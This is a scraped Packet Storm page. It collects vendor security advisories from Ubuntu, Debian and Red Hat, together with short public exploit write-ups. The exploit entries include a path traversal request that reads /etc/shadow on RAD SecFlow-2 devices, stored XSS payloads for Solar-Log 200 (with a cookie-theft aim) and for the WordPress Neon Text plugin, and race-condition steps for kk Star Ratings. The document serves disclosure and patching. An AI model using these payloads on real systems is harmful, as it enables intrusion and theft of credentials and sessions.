Ubuntu Security Notice 6653-4 - It was discovered that a race condition existed in the ATM subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the AppleTalk networking subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6653-4March 04, 2024linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:It was discovered that a race condition existed in the ATM (AsynchronousTransfer Mode) subsystem of the Linux kernel, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51780)It was discovered that a race condition existed in the AppleTalk networkingsubsystem of the Linux kernel, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-51781)Zhenghan Wang discovered that the generic ID allocator implementation inthe Linux kernel did not properly check for null bitmap when releasing IDs.A local attacker could use this to cause a denial of service (systemcrash). (CVE-2023-6915)Robert Morris discovered that the CIFS network file system implementationin the Linux kernel did not properly validate certain server commandsfields, leading to an out-of-bounds read vulnerability. An attacker coulduse this to cause a denial of service (system crash) or possibly exposesensitive information. (CVE-2024-0565)Jann Horn discovered that the TLS subsystem in the Linux kernel did notproperly handle spliced messages, leading to an out-of-bounds writevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2024-0646)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1051-gke     5.15.0-1051.56   linux-image-gke                 5.15.0.1051.50   linux-image-gke-5.15            5.15.0.1051.50After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6653-4   https://ubuntu.com/security/notices/USN-6653-1   CVE-2023-51780, CVE-2023-51781, CVE-2023-6915, CVE-2024-0565,   CVE-2024-0646Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1051.56

Ubuntu Security Notice USN-6653-4

RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.

    # Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63# Date: 3/2024# CVE: CVE-2019-6268# Exploit Author: Branko MilicevicRAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.Steps to reproduce:Request:GET /../../../../../../../../../../etc/shadow HTTP/1.1Response:HTTP/1.1 200 OKroot:nDnjJ****ydh3:11851:0:99999:7:::bin:*:11851:0:99999:7:::daemon:*:11851:0:99999:7:::adm:*:11851:0:99999:7:::lp:*:11851:0:99999:7:::sync:*:11851:0:99999:7:::shutdown:*:11851:0:99999:7:::Vulnerability TypeDirectory TraversalAttack VectorsUnauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).Referencehttps://www.owasp.org/index.php/Path_Traversal

RAD SecFlow-2 Path Traversal

Debian Linux Security Advisory 5635-1 - Aviv Keller discovered that the frames.html file generated by YARD, a documentation generation tool for the Ruby programming language, was vulnerable to cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5635-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 04, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : yardCVE ID         : CVE-2024-27285Aviv Keller discovered that the frames.html file generated by YARD, adocumentation generation tool for the Ruby programming language, wasvulnerable to cross-site scripting.For the oldstable distribution (bullseye), this problem has been fixedin version 0.9.24-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 0.9.28-2+deb12u2.We recommend that you upgrade your yard packages.For the detailed security status of yard please refer toits security tracker page at:https://security-tracker.debian.org/tracker/yardFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXmMwMACgkQEMKTtsN8TjYteA/+OJKIMLYc36uSErez5guFT6OYcCINkwjm8Uv+7S9lkBp3aq80agghHHPwoghyZaW/2VohG/nDEFXh5g/NUPNFT+/044ymLsSMgJOF8C80+K6xJ7C/lHBeqYOMIjxzWuooWe0pL7ZLMpZHIipvbVtlS/M+GkjBudPMptMdk8hxfX3zlNgzJqxvZdE7dOu/eTqUOc+aOXRo7NPXkYfqkzkJxwy6DFnkRMrVd9IvHcYOs3Aw0EQE92QTsB68etFwakgmZZOzLW1ubkYJWGXGKq0ASWuGOlSUGjx62KiGWR53iIGUhY4VEQRUDjmPOVDoxOePO1Vr0W6UPqbsrGqSyKwpU8lqQKqAGbOJyw5XsnOjhu/fk1q9J3DRA/oa8fc/6Vgt+Ys8nOj1YHW+SbxjseRnGFraPqq88ICJ1Lg/UsxHn1RcO1dozClKI+FxLlbyZMFETA1yfy2+iHu6go5jQDTjQHuLk4aUzSAf1y6a8507QWyQSThB+9gehIs+GxTLRzYIOTgB40xrE5vaouVvZb5Qg9j9P1j2DY3+R8+ig+15nnMaVRSAQFaXl+9Vyn3STUox9lvhxBB7tCYEWV4P6IPQqjwsNWMKZR0gfmpJxrql3cUCkFTH68prMfWNbPYfsqVrnVkWQMzkqb1NvAdyYP3TJYEDdG1oI09vIye4d6VXbW4==CnLF-----END PGP SIGNATURE-----

Debian Security Advisory 5635-1

Solar-Log 200 PM+ version 3.6.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Solar-Log 200 3.6.0 web panel# Date: 10-30-23# Exploit Author: Vincent McRae, Mesut Cetin - Redteamer IT Security# Vendor Homepage: https://www.solar-log.com/en/# Version: Solar-Log 200 PM+ 3.6.0 Build 99 - 15.10.2019# Tested on: Proprietary devices: https://www.solar-log.com/en/support/firmware/# CVE: CVE-2023-46344# POC:1. Go to solar panel2. Go to configuration -> Smart Energy -> "drag & drop" button.3. Change "name" to: <xss onmouseenter="alert(document.cookie)"style=display:block>test</xss>4. Once you hover over "test", you get XSS -> if a higher privilegeduser hovers over it, we can get their cookies.

Solar-Log 200 PM+ 3.6.0 Cross Site Scripting

Ubuntu Security Notice 6674-2 - USN-6674-1 fixed a vulnerability in Django. This update provides the corresponding update for Ubuntu 18.04 LTS. Seokchan Yoon discovered that the Django Truncator function incorrectly handled very long HTML input. A remote attacker could possibly use this issue to cause Django to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6674-2  
March 04, 2024

python-django vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Django could be made to consume resources or crash if it received specially  
crafted network traffic.

Software Description:  
- python-django: High-level Python web development framework

Details:

USN-6674-1 fixed a vulnerability in Django. This update provides  
the corresponding update for Ubuntu 18.04 LTS.

Original advisory details:

 Seokchan Yoon discovered that the Django Truncator function incorrectly  
 handled very long HTML input. A remote attacker could possibly use this  
 issue to cause Django to consume resources, leading to a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  python-django                   1:1.11.11-1ubuntu1.21+esm4  
  python3-django                  1:1.11.11-1ubuntu1.21+esm4

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6674-2  
  https://ubuntu.com/security/notices/USN-6674-1  
  CVE-2024-27351

Ubuntu Security Notice USN-6674-2

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

**WordPress Neon Text 1.1 Cross Site Scripting**

Posted Mar 5, 2024

Authored by Eren Car

WordPress Neon Text plugin versions 1.1 and below suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss

advisories | CVE-2023-5817

SHA-256 | f6fa131d3df7c7fa0667803c7757179d6f0f6967ebbb7d6ee2469662460a8a4e

Download | Favorite | View

**WordPress Neon Text 1.1 Cross Site Scripting**

    # Exploit Title: Wordpress Plugin Neon Text <= 1.1 - Stored Cross Site Scripting (XSS)# Date: 2023-11-15# Exploit Author: Eren Car# Vendor Homepage: https://www.eralion.com/# Software Link: https://downloads.wordpress.org/plugin/neon-text.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.4.1# CVE : CVE-2023-5817# 1. Description:The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in 1.1 and above versions.   # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the posts page and create new post.  c. Add shorcode block and insert the following payload:      [neontext_box][neontext color='"onmouseover="alert(document.domain)"']TEST[/neontext][/neontext_box]          d. Save the changes and preview the page. Popup window demonstrating the vulnerability will be executed.

**File Tags**

*   ActiveX (933)
*   Advisory (84,370)
*   Arbitrary (16,579)
*   BBS (2,859)
*   Bypass (1,818)
*   CGI (1,032)
*   Code Execution (7,578)
*   Conference (687)
*   Cracker (844)
*   CSRF (3,370)
*   DoS (24,373)
*   Encryption (2,381)
*   Exploit (52,611)
*   File Inclusion (4,246)
*   File Upload (982)
*   Firewall (822)
*   Info Disclosure (2,832)
*   Intrusion Detection (905)
*   Java (3,117)
*   JavaScript (887)
*   Kernel (6,944)
*   Local (14,657)
*   Magazine (586)
*   Overflow (12,989)
*   Perl (1,430)
*   PHP (5,174)
*   Proof of Concept (2,364)
*   Protocol (3,687)
*   Python (1,595)
*   Remote (31,291)
*   Root (3,613)
*   Rootkit (519)
*   Ruby (617)
*   Scanner (1,647)
*   Security Tool (7,962)
*   Shell (3,236)
*   Shellcode (1,217)
*   Sniffer (899)
*   Spoof (2,255)
*   SQL Injection (16,491)
*   TCP (2,420)
*   Trojan (688)
*   UDP (896)
*   Virus (668)
*   Vulnerability (32,461)
*   Web (9,836)
*   Whitepaper (3,768)
*   x86 (966)
*   XSS (18,130)
*   Other

**File Archives**

*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,060)
*   BSD (375)
*   CentOS (57)
*   Cisco (1,926)
*   Debian (6,978)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,466)
*   HPUX (880)
*   iOS (369)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (48,786)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (487)
*   RedHat (15,203)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,336)
*   UNIX (9,371)
*   UnixWare (187)
*   Windows (6,635)
*   Other

WordPress Neon Text 1.1 Cross Site Scripting

Ubuntu Security Notice 6674-1 - Seokchan Yoon discovered that the Django Truncator function incorrectly handled very long HTML input. A remote attacker could possibly use this issue to cause Django to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6674-1  
March 04, 2024

python-django vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Django could be made to consume resources or crash if it received specially  
crafted network traffic.

Software Description:  
- python-django: High-level Python web development framework

Details:

Seokchan Yoon discovered that the Django Truncator function incorrectly  
handled very long HTML input. A remote attacker could possibly use this  
issue to cause Django to consume resources, leading to a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   python3-django                  3:4.2.4-1ubuntu2.2

Ubuntu 22.04 LTS:  
   python3-django                  2:3.2.12-2ubuntu1.11

Ubuntu 20.04 LTS:  
   python3-django                  2:2.2.12-1ubuntu0.22

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6674-1  
   CVE-2024-27351

Package Information:  
   https://launchpad.net/ubuntu/+source/python-django/3:4.2.4-1ubuntu2.2  
   https://launchpad.net/ubuntu/+source/python-django/2:3.2.12-2ubuntu1.11  
   https://launchpad.net/ubuntu/+source/python-django/2:2.2.12-1ubuntu0.22

Ubuntu Security Notice USN-6674-1

KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.

    # Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.

KK Star Ratings Race Condition

Red Hat Security Advisory 2024-1093-03 - An update for frr is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include an out of bounds read vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1093.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: frr security updateAdvisory ID:        RHSA-2024:1093-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1093Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-38406====================================================================Summary: An update for frr is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:FRRouting is free software that manages TCP/IP based routing protocols. It supports BGP4, OSPFv2, OSPFv3, ISIS, RIP, RIPng, PIM, NHRP, PBR, EIGRP and BFD. Security Fix(es):* ffr: Flowspec overflow in bgpd/bgp_flowspec.c (CVE-2023-38406)* ffr: Out of bounds read in bgpd/bgp_label.c (CVE-2023-38407)* frr: crash from specially crafted MP_UNREACH_NLRI-containing BGP UPDATE message (CVE-2023-47234)* frr: crash from malformed EOR-containing BGP UPDATE message (CVE-2023-47235)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-38406References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2248207https://bugzilla.redhat.com/show_bug.cgi?id=2248208https://bugzilla.redhat.com/show_bug.cgi?id=2248526https://bugzilla.redhat.com/show_bug.cgi?id=2248528

Red Hat Security Advisory 2024-1093-03

Red Hat Security Advisory 2024-1092-03 - An update for tomcat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a HTTP request smuggling vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1092.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tomcat security updateAdvisory ID:        RHSA-2024:1092-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1092Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-46589====================================================================Summary: An update for tomcat is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies.Security Fix(es):* tomcat: HTTP request smuggling via malformed trailer headers (CVE-2023-46589)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46589References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2252050

Source

Packet Storm